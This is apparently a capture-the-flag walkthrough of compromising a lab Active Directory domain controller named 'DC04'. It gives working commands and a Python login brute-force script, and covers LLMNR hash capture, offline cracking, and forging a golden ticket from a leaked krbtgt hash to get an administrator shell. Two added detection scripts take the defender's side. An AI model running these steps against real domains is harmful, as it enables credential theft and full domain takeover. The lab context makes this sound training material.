DC04

Download it, unzip it, and configure the network the same way as for the DC01 machine.
Enumeration:
We will do an SMB sweep to find its IP:
netexec smb 10.0.2.0/24

Then we add it to /etc/hosts:

Now let's start an nmap scan of all TCP ports:
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local

It's an Active Directory machine, and there is a web server running on it.
We can do directory and vhost fuzzing:
gobuster dir -u http://soupedecode.local -w /usr/share/wordlists/dirb/common.txt -t 16

But we get a lot of 403 responses with the same size; we can exclude that size in gobuster using --exclude-length:

Let's take a look at /server-info:

This page usually discloses configuration information about the web server; it can reveal hidden directories, files or subdomains, for example.

If we search a little bit, we will find this subdomain.

Let's add it to /etc/hosts.
LLMNR poisoning to get the NTLMv2 hash of websvc:
We need credentials to authenticate:

Let's try some default credential combinations:

Invalid credentials with admin:admin.

There is no SQLi either.
Let's get the format of the request body, so we can start brute forcing:


I wrote this simple script that will help us brute force this login form using a simple wordlist:
import requests

url = 'http://heartbeat.soupedecode.local'
end_point = '/login.php'
session = requests.session()
# Content-Length is deliberately not set: requests computes it for every body, and a
# fixed value would be wrong for every other username/password length. 'br' was dropped
# from Accept-Encoding because requests only decodes Brotli when the brotli package is
# installed; otherwise req.text would be undecoded bytes and the match below never hits.
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,'
                     'image/svg+xml,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Origin': 'http://heartbeat.soupedecode.local',
           'Connection': 'keep-alive',
           'Referer': 'http://heartbeat.soupedecode.local/login.php',
           'Upgrade-Insecure-Requests': '1',
           'Priority': 'u=0, i'
           }

# Every wordlist entry is tried both as username and as password (n^2 requests).
with open('/usr/share/seclists/Passwords/UserPassCombo-Jay.txt', 'r') as wordlist:
    words = wordlist.readlines()

for username in words:
    username = username.strip()
    for password in words:
        password = password.strip()
        data = f'username={username}&password={password}'
        req = session.post(url=url + end_point, headers=headers, data=data)
        if 'Invalid username' in req.text:
            continue
        else:
            # First hit for this username; stop trying passwords for it.
            print(f'Valid Credentials: {username}:{password}')
            break


I restarted this machine more than once, so as you read on in this blog the IP changes to 10.0.2.33.
After a while we get these credentials.
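As an added defender-side counterpart (not part of the original writeup): the nested wordlist loop above leaves a very recognisable footprint in the web server's access log. This script, written for this page, parses combined-format log lines and flags any client that POSTs to /login.php at least a threshold number of times inside a sliding one-minute window; the log lines it runs on are constructed, not taken from the target.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined-style access-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, TS_FMT), method, path, int(status)

def detect_login_bruteforce(lines, path="/login.php", threshold=10, window=timedelta(minutes=1)):
    """Map each source IP to its peak number of POSTs to `path` inside any `window`,
    keeping only IPs at or above `threshold`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == path:
            posts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop timestamps that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def sample_log():
    """Constructed log lines (not from the target): one scripted client, one normal user."""
    base = datetime(2025, 1, 12, 10, 0, 0, tzinfo=timezone.utc)
    line = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 1532'
    lines = [line.format(ip="10.0.2.15", ts=(base + timedelta(seconds=2 * i)).strftime(TS_FMT),
                         method="POST", path="/login.php", status=200) for i in range(12)]
    lines.append(line.format(ip="10.0.2.20", ts=base.strftime(TS_FMT), method="POST", path="/login.php", status=302))
    lines.append(line.format(ip="10.0.2.20", ts=base.strftime(TS_FMT), method="GET", path="/dashboard.php", status=200))
    lines.append("garbage line that should be ignored")
    return lines

if __name__ == "__main__":
    print(detect_login_bruteforce(sample_log()))   # {'10.0.2.15': 12}
```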

Here it is asking for an IP, so let's try SSRF:


I could not get anything out of it.
But let's start Responder and try to capture the NTLMv2 hash:
sudo responder -I eth0 -dvw



We captured the websvc hash; we can crack it with hashcat:
hashcat websvc.hash /usr/share/wordlists/rockyou.txt


Here we have the cracked password.
Let's try to authenticate:
netexec smb soupedecode.local -u websvc -p jordan23

It says the password has expired, so we can go to the logon UI prompt to reset it:



The password has been changed; let's try it out:

Finally we have valid credentials.
Let's collect the domain data and do some BloodHound enumeration:
bloodhound-python -u websvc -p Caesar3 -ns 10.0.2.33 -d soupedecode.local -dc dc01.soupedecode.local

For some reason we need to set up a fake DNS server for this to work:
dnschef --fakeip 10.0.2.33

Now re-run the bloodhound-python command, but with our localhost IP as the name server instead of the target IP:


Let's start BloodHound, but first we need to start the database that BloodHound uses:
sudo neo4j start

After that we go to that link, log in as neo4j:neo4j, reset the password, and use the same credentials to authenticate in BloodHound:
bloodhound


Drag and drop those JSON files into BloodHound:


I did not find anything that could help us.

Nothing interesting in the home directory of the websvc user in the C share, which we have read access to.
Move laterally to rtina979:
Let's move on and dump the domain users:
netexec smb soupedecode.local -u websvc -p Caesar3 --users > temp.txt

Extract the usernames from that temp file:
cat temp.txt | awk '{print $5}' > users.txt

If we look at the users' descriptions, we will find a default password for one user:


Try to authenticate:

It is also expired, so we can change it using smbpasswd or impacket-changepasswd:
impacket-changepasswd 'soupedecode.local'/'rtina979'@'soupedecode.local' -newpass 'Caesar3!' -altuser websvc -altpass Caesar3

We changed the password successfully.
Privilege escalation via Golden Ticket attack:
Let's go back to the C share again to check the rtina979 home directory:

After enumerating this share I found a file called Report.rar:
smbclient \\\\10.0.2.33\\C -U 'rtina979%Caesar3!'

Download it and try to extract it:
unrar x Report.rar

But it is encrypted with a password; we can use rar2john and then try to crack that hash to get the archive password:
rar2john Report.rar > report.hash
john report.hash --wordlist=/usr/share/wordlists/rockyou.txt

Extract it again with that password:

We have an .htm file and a bunch of JS scripts.

If we open that .htm file in Firefox, we will see that it is a penetration testing report:

After some reading we will find the krbtgt hash of this target domain. Companies usually do not change the krbtgt password, because resetting it is not a simple task, so an old krbtgt hash from a report like this may still be valid.
Let's try to get a golden ticket with that krbtgt hash:

But before that we need the SID of the domain; we can run impacket-lookupsid to get it:
impacket-lookupsid soupedecode.local/rtina979:'Caesar3!'@10.0.2.33

Now we will use impacket-ticketer to forge a ticket:
impacket-ticketer -nthash "0f55cdc40bd8f5814587f7e6b2f85e6f" -domain-sid "S-1-5-21-2986980474-46765180-2505414164" -domain "soupedecode.local" "administrator"

We need to export the ticket path in the KRB5CCNAME environment variable, then authenticate via impacket-wmiexec:
export KRB5CCNAME=administrator.ccache
impacket-wmiexec administrator@dc01.soupedecode.local -k -no-pass -dc-ip 10.0.2.33

We got "clock skew too great" because the time difference between our local machine and the DC is more than 5 minutes, which Kerberos does not tolerate. We can use ntpdate to sync the time and rerun that impacket-wmiexec command.
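An added example for the defending side (not from the original post): the report leaked an old krbtgt hash, and the lesson is that a golden ticket keeps working until the krbtgt password has been reset twice, because the KDC still accepts tickets encrypted under the previous key. This Python, written for this page, decodes the krbtgt account's pwdLastSet FILETIME value, reports the key age, and works out how many resets remain before a hash leaked on a given date stops being accepted; all dates are constructed, and the leaked key is assumed to have been the current key at disclosure.

```python
from datetime import datetime, timedelta, timezone

# Offset between the Windows FILETIME epoch (1601-01-01) and the Unix epoch, in 100 ns ticks.
EPOCH_DELTA_TICKS = 116444736000000000
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

def utc(year, month, day):
    """Small helper so sample dates are unambiguous UTC datetimes."""
    return datetime(year, month, day, tzinfo=timezone.utc)

def filetime_to_datetime(filetime):
    """Decode an AD pwdLastSet value (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return UNIX_EPOCH + timedelta(microseconds=(filetime - EPOCH_DELTA_TICKS) // 10)

def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime; used here only to build constructed sample values."""
    return int((dt - UNIX_EPOCH).total_seconds()) * 10_000_000 + EPOCH_DELTA_TICKS

def krbtgt_key_age_days(pwd_last_set, now):
    """Days since the krbtgt password was last set; a large value is what keeps an old leak usable."""
    return (now - filetime_to_datetime(pwd_last_set)).days

def leaked_key_still_accepted(rotations, leaked_at):
    """rotations: pwdLastSet values recorded at each krbtgt reset; leaked_at: when the hash was
    disclosed (here: the date of the report). The KDC accepts TGTs encrypted under both the current
    and the previous krbtgt key, so a leaked key (assumed to be the current one at disclosure)
    is only dead after two resets dated after the leak. Returns (still_accepted, resets_needed)."""
    resets_after = sum(1 for r in rotations if filetime_to_datetime(r) > leaked_at)
    return resets_after < 2, max(0, 2 - resets_after)

if __name__ == "__main__":
    # Constructed sample values, not data from the target domain.
    resets = [datetime_to_filetime(utc(2023, 1, 1)), datetime_to_filetime(utc(2024, 1, 1))]
    print("krbtgt key age in days:", krbtgt_key_age_days(resets[-1], utc(2024, 12, 31)))
    print("leaked key still accepted, resets needed:", leaked_key_still_accepted(resets, utc(2023, 6, 1)))
```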

Here is the root flag, you can find the user flag in the websvc home directory.